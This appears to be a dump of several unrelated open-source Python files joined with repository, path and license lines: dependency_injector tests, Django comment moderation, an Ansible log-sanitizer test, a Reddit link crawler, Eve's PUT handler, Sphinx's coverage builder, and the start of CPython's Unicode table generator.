        self.assertTrue(self._run(provider(1, 2, 3, 4)), (1, 2, 3, 4))

    def test_call_not_overridden(self):
        provider = providers.AbstractCoroutine(_example)

        with self.assertRaises(errors.Error):
            provider(1, 2, 3, 4)

    def test_override_by_not_coroutine(self):
        provider = providers.AbstractCoroutine(_example)

        with self.assertRaises(errors.Error):
            provider.override(providers.Factory(object))

    def test_provide_not_implemented(self):
        provider = providers.AbstractCoroutine(_example)

        with self.assertRaises(NotImplementedError):
            provider._provide((1, 2, 3, 4), dict())

    def test_repr(self):
        provider = providers.AbstractCoroutine(_example)

        self.assertEqual(repr(provider),
                         '<dependency_injector.providers.'
                         'AbstractCoroutine({0}) at {1}>'.format(
                             repr(_example),
                             hex(id(provider))))
class CoroutineDelegateTests(unittest.TestCase):
    """Tests for ``CoroutineDelegate``."""

    def setUp(self):
        # A delegate wraps a coroutine provider and serves it as-is.
        self.delegated = providers.Coroutine(_example)
        self.delegate = providers.CoroutineDelegate(self.delegated)

    def test_is_delegate(self):
        self.assertIsInstance(self.delegate, providers.Delegate)

    def test_init_with_not_callable(self):
        # Wrapping a non-coroutine provider must be rejected.
        with self.assertRaises(errors.Error):
            providers.CoroutineDelegate(providers.Object(object()))
| bsd-3-clause |
sanjeevtripurari/hue | desktop/core/ext-py/Django-1.6.10/django/contrib/comments/moderation.py | 121 | 13553 | """
A generic comment-moderation system which allows configuration of
moderation options on a per-model basis.
To use, do two things:
1. Create or import a subclass of ``CommentModerator`` defining the
options you want.
2. Import ``moderator`` from this module and register one or more
models, passing the models and the ``CommentModerator`` options
class you want to use.
Example
-------
First, we define a simple model class which might represent entries in
a Weblog::
from django.db import models
class Entry(models.Model):
title = models.CharField(maxlength=250)
body = models.TextField()
pub_date = models.DateField()
enable_comments = models.BooleanField()
Then we create a ``CommentModerator`` subclass specifying some
moderation options::
from django.contrib.comments.moderation import CommentModerator, moderator
class EntryModerator(CommentModerator):
email_notification = True
enable_field = 'enable_comments'
And finally register it for moderation::
moderator.register(Entry, EntryModerator)
This sample class would apply two moderation steps to each new
comment submitted on an Entry:
* If the entry's ``enable_comments`` field is set to ``False``, the
comment will be rejected (immediately deleted).
* If the comment is successfully posted, an email notification of the
comment will be sent to site staff.
For a full list of built-in moderation options and other
configurability, see the documentation for the ``CommentModerator``
class.
"""
import datetime
from django.conf import settings
from django.core.mail import send_mail
from django.contrib.comments import signals
from django.db.models.base import ModelBase
from django.template import Context, loader
from django.contrib import comments
from django.contrib.sites.models import get_current_site
from django.utils import timezone
class AlreadyModerated(Exception):
    """
    Signals an attempt to register a model for moderation when it is
    already registered.
    """
class NotModerated(Exception):
    """
    Signals an attempt to unregister a model that is not currently
    registered for moderation.
    """
class CommentModerator(object):
    """
    Encapsulates comment-moderation options for a given model.

    Not meant to be used directly: subclass it and override attributes
    to enable the options you need.

    ``enable_field``
        Name of a ``BooleanField`` on the moderated model; comments are
        rejected (deleted) while its value is ``False``. Default ``None``.

    ``auto_close_field`` / ``close_after``
        Name of a ``DateField``/``DateTimeField`` plus a number of days;
        once that many days have passed after the stored date, new
        comments are disallowed. Defaults ``None``.

    ``auto_moderate_field`` / ``moderate_after``
        Like the pair above, but instead of deleting new comments they
        are marked non-public (``is_public = False``). Defaults ``None``.

    ``email_notification``
        When ``True``, each comment that survives moderation triggers an
        email to site staff. Default ``False``.

    For further customization override ``allow``, ``moderate`` or
    ``email``; each receives the comment, the content object it is
    attached to, and the current ``HttpRequest``. The moderated model is
    available to subclasses as ``self._model``.
    """

    auto_close_field = None
    auto_moderate_field = None
    close_after = None
    email_notification = False
    enable_field = None
    moderate_after = None

    def __init__(self, model):
        # Keep a reference so subclasses can introspect the model.
        self._model = model

    def _get_delta(self, now, then):
        """
        Return ``now - then`` as a ``datetime.timedelta``.

        If one argument is a ``datetime.date`` and the other a
        ``datetime.datetime``, both are coerced to ``datetime.date``
        before subtracting. ``now`` must not precede ``then``.
        """
        if now.__class__ is not then.__class__:
            # Mixed date/datetime: compare at day granularity.
            now = datetime.date(now.year, now.month, now.day)
            then = datetime.date(then.year, then.month, then.day)
        if now < then:
            raise ValueError("Cannot determine moderation rules because date field is set to a value in the future")
        return now - then

    def allow(self, comment, content_object, request):
        """
        Return ``True`` if the comment may be posted on
        ``content_object``, ``False`` otherwise.
        """
        if self.enable_field and not getattr(content_object, self.enable_field):
            return False
        if self.auto_close_field and self.close_after is not None:
            closing_date = getattr(content_object, self.auto_close_field)
            if closing_date is not None:
                age = self._get_delta(timezone.now(), closing_date).days
                if age >= self.close_after:
                    return False
        return True

    def moderate(self, comment, content_object, request):
        """
        Return ``True`` if the comment should be held for approval
        (marked non-public), ``False`` if it may appear immediately.
        """
        if self.auto_moderate_field and self.moderate_after is not None:
            threshold_date = getattr(content_object, self.auto_moderate_field)
            if threshold_date is not None:
                age = self._get_delta(timezone.now(), threshold_date).days
                if age >= self.moderate_after:
                    return True
        return False

    def email(self, comment, content_object, request):
        """
        Email site staff about a new comment when notifications are
        enabled; no-op otherwise.
        """
        if not self.email_notification:
            return
        recipient_list = [manager_tuple[1] for manager_tuple in settings.MANAGERS]
        template = loader.get_template('comments/comment_notification_email.txt')
        context = Context({'comment': comment,
                           'content_object': content_object})
        subject = '[%s] New comment posted on "%s"' % (get_current_site(request).name,
                                                       content_object)
        send_mail(subject, template.render(context),
                  settings.DEFAULT_FROM_EMAIL, recipient_list,
                  fail_silently=True)
class Moderator(object):
    """
    Applies comment moderation for a registry of models.

    Register a model (or list of models) together with a
    ``CommentModerator`` subclass via ``register``; stop moderating with
    ``unregister``. Moderation runs in two phases hooked to the comment
    signals: ``pre_save_moderation`` may mark a comment non-public or
    reject it outright, and ``post_save_moderation`` sends any
    notification emails once the comment has been stored.
    """

    def __init__(self):
        self._registry = {}
        self.connect()

    def connect(self):
        """Attach the moderation hooks to the comment signals."""
        signals.comment_will_be_posted.connect(self.pre_save_moderation, sender=comments.get_model())
        signals.comment_was_posted.connect(self.post_save_moderation, sender=comments.get_model())

    def register(self, model_or_iterable, moderation_class):
        """
        Register one model (or several) for moderation using
        ``moderation_class``; raise ``AlreadyModerated`` for models that
        are already registered.
        """
        if isinstance(model_or_iterable, ModelBase):
            # Normalize a single model into a one-element list.
            model_or_iterable = [model_or_iterable]
        for model in model_or_iterable:
            if model in self._registry:
                raise AlreadyModerated("The model '%s' is already being moderated" % model._meta.model_name)
            self._registry[model] = moderation_class(model)

    def unregister(self, model_or_iterable):
        """
        Remove one model (or several) from moderation; raise
        ``NotModerated`` for models that are not registered.
        """
        if isinstance(model_or_iterable, ModelBase):
            model_or_iterable = [model_or_iterable]
        for model in model_or_iterable:
            if model not in self._registry:
                raise NotModerated("The model '%s' is not currently being moderated" % model._meta.model_name)
            del self._registry[model]

    def pre_save_moderation(self, sender, comment, request, **kwargs):
        """Apply pre-save moderation to a new comment."""
        model = comment.content_type.model_class()
        if model not in self._registry:
            return
        content_object = comment.content_object
        moderation_class = self._registry[model]

        # Returning False rejects the comment outright (HTTP 403).
        if not moderation_class.allow(comment, content_object, request):
            return False
        # Otherwise the comment may still be held for approval.
        if moderation_class.moderate(comment, content_object, request):
            comment.is_public = False

    def post_save_moderation(self, sender, comment, request, **kwargs):
        """Apply post-save moderation (email notification) to a comment."""
        model = comment.content_type.model_class()
        if model not in self._registry:
            return
        self._registry[model].email(comment, comment.content_object, request)
# Import this instance in your own code to use in registering
# your models for moderation.
# Module-level singleton: instantiating it connects the moderation
# hooks to the comment signals at import time.
moderator = Moderator()
| apache-2.0 |
soarpenguin/ansible | test/units/module_utils/basic/test_heuristic_log_sanitize.py | 66 | 3816 | # -*- coding: utf-8 -*-
# (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division)
__metaclass__ = type
import sys
import syslog
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch, MagicMock
from ansible.module_utils.basic import heuristic_log_sanitize
class TestHeuristicLogSanitize(unittest.TestCase):
    """Tests for ansible.module_utils.basic.heuristic_log_sanitize."""

    def setUp(self):
        # Secrets embedded both in URL form and in bare ssh-style form;
        # the passwords deliberately contain ':' to exercise the parser.
        self.URL_SECRET = 'http://username:pas:word@foo.com/data'
        self.SSH_SECRET = 'username:pas:word@foo.com/data'
        self.clean_data = repr(self._gen_data(3, True, True, 'no_secret_here'))
        self.url_data = repr(self._gen_data(3, True, True, self.URL_SECRET))
        self.ssh_data = repr(self._gen_data(3, True, True, self.SSH_SECRET))

    def _gen_data(self, records, per_rec, top_level, secret_text):
        """Build a hostvars-like nested dict, optionally planting
        ``secret_text`` into each record and/or at the top level.

        NOTE(review): ``range(1, records, 1)`` yields ``records - 1``
        hosts; preserved as-is since the assertions depend on it.
        """
        hostvars = {'hostvars': {}}
        for i in range(1, records, 1):
            host_facts = {
                'host%s' % i: {
                    'pstack': {
                        'running': '875.1',
                        'symlinked': '880.0',
                        'tars': [],
                        'versions': ['885.0']
                    },
                }
            }
            if per_rec:
                host_facts['host%s' % i]['secret'] = secret_text
            hostvars['hostvars'].update(host_facts)
        if top_level:
            hostvars['secret'] = secret_text
        return hostvars

    def test_did_not_hide_too_much(self):
        # assertEqual, not the deprecated assertEquals alias.
        self.assertEqual(heuristic_log_sanitize(self.clean_data), self.clean_data)

    def test_hides_url_secrets(self):
        url_output = heuristic_log_sanitize(self.url_data)
        # Basic functionality: Successfully hid the password
        self.assertNotIn('pas:word', url_output)
        # Slightly more advanced, we hid all of the password despite the ":"
        self.assertNotIn('pas', url_output)
        # In this implementation we replace the password with 8 "*" which is
        # also the length of our password. The url fields should be able to
        # accurately detect where the password ends so the length should be
        # the same:
        self.assertEqual(len(url_output), len(self.url_data))

    def test_hides_ssh_secrets(self):
        ssh_output = heuristic_log_sanitize(self.ssh_data)
        self.assertNotIn('pas:word', ssh_output)
        # Slightly more advanced, we hid all of the password despite the ":"
        self.assertNotIn('pas', ssh_output)
        # ssh checking is harder as the heuristic is overzealous in many
        # cases. Since the input will have at least one ":" present before
        # the password we can tell some things about the beginning and end of
        # the data, though:
        self.assertTrue(ssh_output.startswith("{'"))
        self.assertTrue(ssh_output.endswith("}"))
        self.assertIn(":********@foo.com/data'", ssh_output)

    def test_hides_parameter_secrets(self):
        output = heuristic_log_sanitize('token="secret", user="person", token_entry="test=secret"', frozenset(['secret']))
        self.assertNotIn('secret', output)
| gpl-3.0 |
jlblatt/Hollowbot | links.py | 1 | 3835 | import datetime
import json
import time
from conf import _
from init import db, cur, opener
import log
import lib
import stats
lcount = 0
def get(url):
    # Fetch up to _['page_limit'] pages of link listings from `url`,
    # following the JSON 'after' pagination cursor, and upsert each 't3'
    # (link) item into the `t3` database table.
    log.write("Getting %d page(s) of %d links from: %s..." % (_['page_limit'], _['links_per_page'], url), 'message')
    start = time.time()
    after = ''
    for p in range(_['page_limit']):
        # A null 'after' cursor from the previous page means no more pages.
        if after is None: break
        if after != '': finalUrl = url + '&after=' + after
        else: finalUrl = url
        try:
            success = False
            for i in range(_['http_retries']):
                f = opener.open(finalUrl)
                if f.getcode() == 200:
                    success = True
                    break
                else:
                    log.write('Error %d for links url: %s' % (f.getcode(), finalUrl), 'error')
                    # Auth/permission/not-found errors will not improve on retry.
                    if f.getcode() in [401, 403, 404]:
                        return
                    time.sleep(_['sleep'])
            if success == False:
                log.write('Retries exhausted for links url: %s' % finalUrl, 'error');
                return
            time.sleep(_['sleep'])
        except Exception, e:
            log.write('Error opening links url: %s - %s' % (finalUrl, e), 'error')
            return
        rJSON = f.read()
        f.close()
        try: links = json.loads(rJSON)
        except Exception, e:
            log.write('Error parsing links url: %s - %s' % (finalUrl, e), 'error')
            return
        after = links['data']['after']
        for l in links['data']['children']:
            try:
                if l['kind'] == 't3':
                    try:
                        # Seen before? Just refresh last_seen; otherwise insert.
                        cur.execute("select id from t3 where id = %s", (lib.base36decode(l['data']['id']),))
                        if cur.rowcount > 0:
                            cur.execute("update t3 set last_seen = now() where id = %s", (lib.base36decode(l['data']['id']),))
                        else:
                            # Self posts carry their own text; external links
                            # store no content.
                            if l['data']['is_self']: content = l['data']['selftext']
                            else: content = None;
                            cur.execute("""insert into t3 (
                                id,
                                title,
                                url,
                                permalink,
                                content,
                                author,
                                created,
                                last_seen,
                                last_crawled
                            ) values (%s, %s, %s, %s, %s, %s, %s, now(), 0)""", (
                                lib.base36decode(l['data']['id']),
                                l['data']['title'],
                                l['data']['url'],
                                l['data']['permalink'],
                                content,
                                l['data']['author'],
                                datetime.datetime.fromtimestamp(l['data']['created_utc'])
                            ))
                            db.commit()
                    except Exception, e:
                        log.write('Error storing t3_' + l['data']['id'] + ': %s' % e, 'error')
                        db.rollback()
            except Exception, e:
                log.write('Error checking links file node type: %s' % e, 'error')
        #endfor l in links
        # Record per-page throughput stats (count of children, elapsed time).
        stats.linkTimes['counts'].append(len(links['data']['children']))
        stats.linkTimes['times'].append(time.time() - start)
        time.sleep(_['sleep'])
    #endfor p in pages
| gpl-3.0 |
amagdas/eve | eve/methods/put.py | 2 | 8754 | # -*- coding: utf-8 -*-
"""
eve.methods.put
~~~~~~~~~~~~~~~
This module imlements the PUT method.
:copyright: (c) 2015 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from werkzeug import exceptions
from datetime import datetime
from eve.auth import requires_auth
from eve.defaults import resolve_default_values
from eve.validation import ValidationError
from flask import current_app as app, abort
from eve.utils import config, debug_error_message, parse_request
from eve.methods.common import get_document, parse, payload as payload_, \
ratelimit, pre_event, store_media_files, resolve_user_restricted_access, \
resolve_embedded_fields, build_response_document, marshal_write_response, \
resolve_document_etag, oplog_push
from eve.versioning import resolve_document_version, \
insert_versioning_documents, late_versioning_catch
@ratelimit()
@requires_auth('item')
@pre_event
def put(resource, payload=None, **lookup):
    """
    Default handler for PUT requests.

    The decorators take care of rate limiting, authentication and the
    pre-request event; the actual document replacement is delegated to
    :func:`put_internal` with concurrency checking turned on and payload
    validation enabled.

    .. versionchanged:: 0.5
       Split into put() and put_internal().
    """
    return put_internal(
        resource,
        payload,
        concurrency_check=True,
        skip_validation=False,
        **lookup
    )
def put_internal(resource, payload=None, concurrency_check=False,
                 skip_validation=False, **lookup):
    """ Intended for internal put calls, this method is not rate limited,
    authentication is not checked, pre-request events are not raised, and
    concurrency checking is optional. Performs a document replacement.
    Updates are first validated against the resource schema. If validation
    passes, the document is replaced and an OK status update is returned.
    If validation fails a set of validation issues is returned.

    :param resource: the name of the resource to which the document belongs.
    :param payload: alternative payload. When calling put() from your own code
                    you can provide an alternative payload. This can be useful,
                    for example, when you have a callback function hooked to a
                    certain endpoint, and want to perform additional put()
                    calls from there.
                    Please be advised that in order to successfully use this
                    option, a request context must be available.
    :param concurrency_check: concurrency check switch (bool)
    :param skip_validation: skip payload validation before write (bool)
    :param **lookup: document lookup query.

    .. versionchanged:: 0.6
       Allow restoring soft deleted documents via PUT

    .. versionchanged:: 0.5
       Back to resolving default values after validation as now the validator
       can properly validate dependency even when some have default values. See
       #353.
       Original put() has been split into put() and put_internal().
       You can now pass a pre-defined custom payload to the function.
       ETAG is now stored with the document (#369).
       Catching all HTTPExceptions and returning them to the caller, allowing
       for eventual flask.abort() invocations in callback functions to go
       through. Fixes #395.

    .. versionchanged:: 0.4
       Allow abort() to be invoked by callback functions.
       Resolve default values before validation is performed. See #353.
       Raise 'on_replace' instead of 'on_insert'. The callback function gets
       the document (as opposed to a list of just 1 document) as an argument.
       Support for document versioning.
       Raise `on_replaced` after the document has been replaced

    .. versionchanged:: 0.3
       Support for media fields.
       When IF_MATCH is disabled, no etag is included in the payload.
       Support for new validation format introduced with Cerberus v0.5.

    .. versionchanged:: 0.2
       Use the new STATUS setting.
       Use the new ISSUES setting.
       Raise pre_<method> event.
       Explicitly resolve default values instead of letting them be resolved
       by common.parse. This avoids a validation error when a read-only field
       also has a default value.

    .. versionchanged:: 0.1.1
       auth.request_auth_value is now used to store the auth_field value.
       Item-identifier wrapper stripped from both request and response payload.

    .. versionadded:: 0.1.0
    """
    resource_def = app.config['DOMAIN'][resource]
    schema = resource_def['schema']
    if not skip_validation:
        validator = app.validator(schema, resource)
    if payload is None:
        payload = payload_()
    # Fetch the current document; honors the If-Match/etag concurrency check.
    original = get_document(resource, concurrency_check, **lookup)
    if not original:
        # not found
        abort(404)
    last_modified = None
    etag = None
    issues = {}
    object_id = original[config.ID_FIELD]
    response = {}
    if config.BANDWIDTH_SAVER is True:
        embedded_fields = []
    else:
        req = parse_request(resource)
        embedded_fields = resolve_embedded_fields(resource, req)
    try:
        document = parse(payload, resource)
        if skip_validation:
            validation = True
        else:
            validation = validator.validate_replace(document, object_id,
                                                    original)
        if validation:
            # sneak in a shadow copy if it wasn't already there
            late_versioning_catch(original, resource)
            # update meta
            last_modified = datetime.utcnow().replace(microsecond=0)
            document[config.LAST_UPDATED] = last_modified
            document[config.DATE_CREATED] = original[config.DATE_CREATED]
            if resource_def['soft_delete'] is True:
                # PUT with soft delete enabled should always set the DELETED
                # field to False. We are either carrying through un-deleted
                # status, or restoring a soft deleted document
                document[config.DELETED] = False
            # ID_FIELD not in document means it is not being automatically
            # handled (it has been set to a field which exists in the
            # resource schema.
            if config.ID_FIELD not in document:
                document[config.ID_FIELD] = object_id
            resolve_user_restricted_access(document, resource)
            resolve_default_values(document, resource_def['defaults'])
            store_media_files(document, resource, original)
            resolve_document_version(document, resource, 'PUT', original)
            # notify callbacks
            getattr(app, "on_replace")(resource, document, original)
            getattr(app, "on_replace_%s" % resource)(document, original)
            resolve_document_etag(document, resource)
            # write to db
            try:
                app.data.replace(
                    resource, object_id, document, original)
            except app.data.OriginalChangedError:
                if concurrency_check:
                    abort(412, description=debug_error_message(
                        'Client and server etags don\'t match'
                    ))
            # update oplog if needed
            oplog_push(resource, document, 'PUT')
            insert_versioning_documents(resource, document)
            # notify callbacks
            getattr(app, "on_replaced")(resource, document, original)
            getattr(app, "on_replaced_%s" % resource)(document, original)
            # build the full response document
            build_response_document(
                document, resource, embedded_fields, document)
            response = document
            if config.IF_MATCH:
                etag = response[config.ETAG]
        else:
            issues = validator.errors
    except ValidationError as e:
        # TODO should probably log the error and abort 400 instead (when we
        # got logging)
        issues['validator exception'] = str(e)
    except exceptions.HTTPException as e:
        raise e
    except Exception as e:
        # consider all other exceptions as Bad Requests
        abort(400, description=debug_error_message(
            'An exception occurred: %s' % e
        ))
    if len(issues):
        response[config.ISSUES] = issues
        response[config.STATUS] = config.STATUS_ERR
        status = config.VALIDATION_ERROR_STATUS
    else:
        response[config.STATUS] = config.STATUS_OK
        status = 200
    # limit what actually gets sent to minimize bandwidth usage
    response = marshal_write_response(response, resource)
    return response, last_modified, etag, status
| bsd-3-clause |
crakensio/django_training | lib/python2.7/site-packages/sphinx/ext/coverage.py | 11 | 9788 | # -*- coding: utf-8 -*-
"""
sphinx.ext.coverage
~~~~~~~~~~~~~~~~~~~
Check Python modules and C API for coverage. Mostly written by Josip
Dzolonga for the Google Highly Open Participation contest.
:copyright: Copyright 2007-2014 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
import glob
import inspect
import cPickle as pickle
from os import path
from sphinx.builders import Builder
# utility
def write_header(f, text, char='-'):
    # Write *text* to *f* followed by an underline of matching length
    # built from *char* (reST-style section header).
    underline = char * len(text)
    f.write(text + '\n')
    f.write(underline + '\n')
def compile_regex_list(name, exps, warnfunc):
    # Compile each expression in *exps*; invalid patterns are skipped and
    # reported through *warnfunc* with the owning config option *name*.
    compiled = []
    for pattern in exps:
        try:
            compiled.append(re.compile(pattern))
        except Exception:
            warnfunc('invalid regex %r in %s' % (pattern, name))
    return compiled
class CoverageBuilder(Builder):
    # Sphinx builder that, instead of rendering documentation, writes
    # coverage reports (c.txt / python.txt plus a pickled summary) listing
    # API elements that exist in the code but are not documented.
    name = 'coverage'

    def init(self):
        # Collect the C source files to scan for undocumented API items.
        self.c_sourcefiles = []
        for pattern in self.config.coverage_c_path:
            pattern = path.join(self.srcdir, pattern)
            self.c_sourcefiles.extend(glob.glob(pattern))
        # (name, regex) pairs used to recognize C declarations by type.
        self.c_regexes = []
        for (name, exp) in self.config.coverage_c_regexes.items():
            try:
                self.c_regexes.append((name, re.compile(exp)))
            except Exception:
                self.warn('invalid regex %r in coverage_c_regexes' % exp)
        # Per-declaration-type ignore lists for the C scan.
        self.c_ignorexps = {}
        for (name, exps) in self.config.coverage_ignore_c_items.iteritems():
            self.c_ignorexps[name] = compile_regex_list(
                'coverage_ignore_c_items', exps, self.warn)
        # Ignore lists for Python modules, classes and functions.
        self.mod_ignorexps = compile_regex_list(
            'coverage_ignore_modules', self.config.coverage_ignore_modules,
            self.warn)
        self.cls_ignorexps = compile_regex_list(
            'coverage_ignore_classes', self.config.coverage_ignore_classes,
            self.warn)
        self.fun_ignorexps = compile_regex_list(
            'coverage_ignore_functions', self.config.coverage_ignore_functions,
            self.warn)

    def get_outdated_docs(self):
        # Always considered outdated; the "docs" here are the reports.
        return 'coverage overview'

    def write(self, *ignored):
        # Build and write the Python report, then the C report.
        self.py_undoc = {}
        self.build_py_coverage()
        self.write_py_coverage()
        self.c_undoc = {}
        self.build_c_coverage()
        self.write_c_coverage()

    def build_c_coverage(self):
        # Fetch all the info from the header files
        c_objects = self.env.domaindata['c']['objects']
        for filename in self.c_sourcefiles:
            undoc = []
            f = open(filename, 'r')
            try:
                for line in f:
                    for key, regex in self.c_regexes:
                        match = regex.match(line)
                        if match:
                            name = match.groups()[0]
                            if name not in c_objects:
                                # Skip names matched by an ignore pattern.
                                for exp in self.c_ignorexps.get(key, ()):
                                    if exp.match(name):
                                        break
                                else:
                                    undoc.append((key, name))
                                continue
            finally:
                f.close()
            if undoc:
                self.c_undoc[filename] = undoc

    def write_c_coverage(self):
        output_file = path.join(self.outdir, 'c.txt')
        op = open(output_file, 'w')
        try:
            if self.config.coverage_write_headline:
                write_header(op, 'Undocumented C API elements', '=')
            op.write('\n')
            for filename, undoc in self.c_undoc.iteritems():
                write_header(op, filename)
                for typ, name in undoc:
                    op.write(' * %-50s [%9s]\n' % (name, typ))
                op.write('\n')
        finally:
            op.close()

    def build_py_coverage(self):
        objects = self.env.domaindata['py']['objects']
        modules = self.env.domaindata['py']['modules']
        skip_undoc = self.config.coverage_skip_undoc_in_source
        for mod_name in modules:
            # Honor the module ignore list.
            ignore = False
            for exp in self.mod_ignorexps:
                if exp.match(mod_name):
                    ignore = True
                    break
            if ignore:
                continue
            try:
                mod = __import__(mod_name, fromlist=['foo'])
            except ImportError, err:
                self.warn('module %s could not be imported: %s' %
                          (mod_name, err))
                self.py_undoc[mod_name] = {'error': err}
                continue
            funcs = []
            classes = {}
            for name, obj in inspect.getmembers(mod):
                # diverse module attributes are ignored:
                if name[0] == '_':
                    # begins in an underscore
                    continue
                if not hasattr(obj, '__module__'):
                    # cannot be attributed to a module
                    continue
                if obj.__module__ != mod_name:
                    # is not defined in this module
                    continue
                full_name = '%s.%s' % (mod_name, name)
                if inspect.isfunction(obj):
                    if full_name not in objects:
                        # Undocumented function, unless ignored or (when
                        # configured) lacking a docstring in the source.
                        for exp in self.fun_ignorexps:
                            if exp.match(name):
                                break
                        else:
                            if skip_undoc and not obj.__doc__:
                                continue
                            funcs.append(name)
                elif inspect.isclass(obj):
                    for exp in self.cls_ignorexps:
                        if exp.match(name):
                            break
                    else:
                        if full_name not in objects:
                            if skip_undoc and not obj.__doc__:
                                continue
                            # not documented at all
                            classes[name] = []
                            continue
                        # Class is documented; check its methods.
                        attrs = []
                        for attr_name in dir(obj):
                            if attr_name not in obj.__dict__:
                                # inherited attribute; skip
                                continue
                            attr = getattr(obj, attr_name)
                            if not (inspect.ismethod(attr) or
                                    inspect.isfunction(attr)):
                                continue
                            if attr_name[0] == '_':
                                # starts with an underscore, ignore it
                                continue
                            if skip_undoc and not attr.__doc__:
                                # skip methods without docstring if wished
                                continue
                            full_attr_name = '%s.%s' % (full_name, attr_name)
                            if full_attr_name not in objects:
                                attrs.append(attr_name)
                        if attrs:
                            # some attributes are undocumented
                            classes[name] = attrs
            self.py_undoc[mod_name] = {'funcs': funcs, 'classes': classes}

    def write_py_coverage(self):
        output_file = path.join(self.outdir, 'python.txt')
        op = open(output_file, 'w')
        failed = []
        try:
            if self.config.coverage_write_headline:
                write_header(op, 'Undocumented Python objects', '=')
            keys = self.py_undoc.keys()
            keys.sort()
            for name in keys:
                undoc = self.py_undoc[name]
                if 'error' in undoc:
                    failed.append((name, undoc['error']))
                else:
                    if not undoc['classes'] and not undoc['funcs']:
                        continue
                    write_header(op, name)
                    if undoc['funcs']:
                        op.write('Functions:\n')
                        op.writelines(' * %s\n' % x for x in undoc['funcs'])
                        op.write('\n')
                    if undoc['classes']:
                        op.write('Classes:\n')
                        for name, methods in sorted(
                                undoc['classes'].iteritems()):
                            if not methods:
                                op.write(' * %s\n' % name)
                            else:
                                op.write(' * %s -- missing methods:\n\n' % name)
                                op.writelines('   - %s\n' % x for x in methods)
                                # NOTE(review): blank-line placement below is
                                # reconstructed from a whitespace-stripped
                                # source — confirm against upstream sphinx.
                                op.write('\n')
            if failed:
                write_header(op, 'Modules that failed to import')
                op.writelines(' * %s -- %s\n' % x for x in failed)
        finally:
            op.close()

    def finish(self):
        # dump the coverage data to a pickle file too
        picklepath = path.join(self.outdir, 'undoc.pickle')
        dumpfile = open(picklepath, 'wb')
        try:
            pickle.dump((self.py_undoc, self.c_undoc), dumpfile)
        finally:
            dumpfile.close()
def setup(app):
    """Register the coverage builder and its configuration values."""
    app.add_builder(CoverageBuilder)
    # (option name, default, rebuild condition) for every coverage_* option;
    # none of them triggers a rebuild when changed
    for option, default in [
        ('coverage_ignore_modules', []),
        ('coverage_ignore_functions', []),
        ('coverage_ignore_classes', []),
        ('coverage_c_path', []),
        ('coverage_c_regexes', {}),
        ('coverage_ignore_c_items', {}),
        ('coverage_write_headline', True),
        ('coverage_skip_undoc_in_source', False),
    ]:
        app.add_config_value(option, default, False)
| cc0-1.0 |
nikhilprathapani/python-for-android | python3-alpha/python3-src/Tools/unicode/makeunicodedata.py | 47 | 40714 | #
# (re)generate unicode property and type databases
#
# this script converts a unicode 3.2 database file to
# Modules/unicodedata_db.h, Modules/unicodename_db.h,
# and Objects/unicodetype_db.h
#
# history:
# 2000-09-24 fl created (based on bits and pieces from unidb)
# 2000-09-25 fl merged tim's splitbin fixes, separate decomposition table
# 2000-09-25 fl added character type table
# 2000-09-26 fl added LINEBREAK, DECIMAL, and DIGIT flags/fields (2.0)
# 2000-11-03 fl expand first/last ranges
# 2001-01-19 fl added character name tables (2.1)
# 2001-01-21 fl added decomp compression; dynamic phrasebook threshold
# 2002-09-11 wd use string methods
# 2002-10-18 mvl update to Unicode 3.2
# 2002-10-22 mvl generate NFC tables
# 2002-11-24 mvl expand all ranges, sort names version-independently
# 2002-11-25 mvl add UNIDATA_VERSION
# 2004-05-29 perky add east asian width information
# 2006-03-10 mvl update to Unicode 4.1; add UCD 3.2 delta
# 2008-06-11 gb add PRINTABLE_MASK for Atsuo Ishimoto's ascii() patch
#
# written by Fredrik Lundh (fredrik@pythonware.com)
#
import sys, os, zipfile
SCRIPT = sys.argv[0]
VERSION = "3.2"  # version of this generator script, not of Unicode

# The Unicode Database
UNIDATA_VERSION = "6.0.0"
# file name templates; %s is filled with "" for the current version or
# "-<version>" for an old version (see open_data())
UNICODE_DATA = "UnicodeData%s.txt"
COMPOSITION_EXCLUSIONS = "CompositionExclusions%s.txt"
EASTASIAN_WIDTH = "EastAsianWidth%s.txt"
UNIHAN = "Unihan%s.zip"
DERIVED_CORE_PROPERTIES = "DerivedCoreProperties%s.txt"
DERIVEDNORMALIZATION_PROPS = "DerivedNormalizationProps%s.txt"
LINE_BREAK = "LineBreak%s.txt"

# older Unicode versions for which delta tables are generated
old_versions = ["3.2.0"]

# general-category names; index 0 ("Cn") doubles as "unassigned"
CATEGORY_NAMES = [ "Cn", "Lu", "Ll", "Lt", "Mn", "Mc", "Me", "Nd",
    "Nl", "No", "Zs", "Zl", "Zp", "Cc", "Cf", "Cs", "Co", "Cn", "Lm",
    "Lo", "Pc", "Pd", "Ps", "Pe", "Pi", "Pf", "Po", "Sm", "Sc", "Sk",
    "So" ]

BIDIRECTIONAL_NAMES = [ "", "L", "LRE", "LRO", "R", "AL", "RLE", "RLO",
    "PDF", "EN", "ES", "ET", "AN", "CS", "NSM", "BN", "B", "S", "WS",
    "ON" ]

EASTASIANWIDTH_NAMES = [ "F", "H", "W", "Na", "A", "N" ]

# LineBreak.txt classes that force a mandatory break
MANDATORY_LINE_BREAKS = [ "BK", "CR", "LF", "NL" ]

# note: should match definitions in Objects/unicodectype.c
ALPHA_MASK = 0x01
DECIMAL_MASK = 0x02
DIGIT_MASK = 0x04
LOWER_MASK = 0x08
LINEBREAK_MASK = 0x10
SPACE_MASK = 0x20
TITLE_MASK = 0x40
UPPER_MASK = 0x80
XID_START_MASK = 0x100
XID_CONTINUE_MASK = 0x200
PRINTABLE_MASK = 0x400
NODELTA_MASK = 0x800
NUMERIC_MASK = 0x1000

# these ranges need to match unicodedata.c:is_unified_ideograph
cjk_ranges = [
    ('3400', '4DB5'),
    ('4E00', '9FCB'),
    ('20000', '2A6D6'),
    ('2A700', '2B734'),
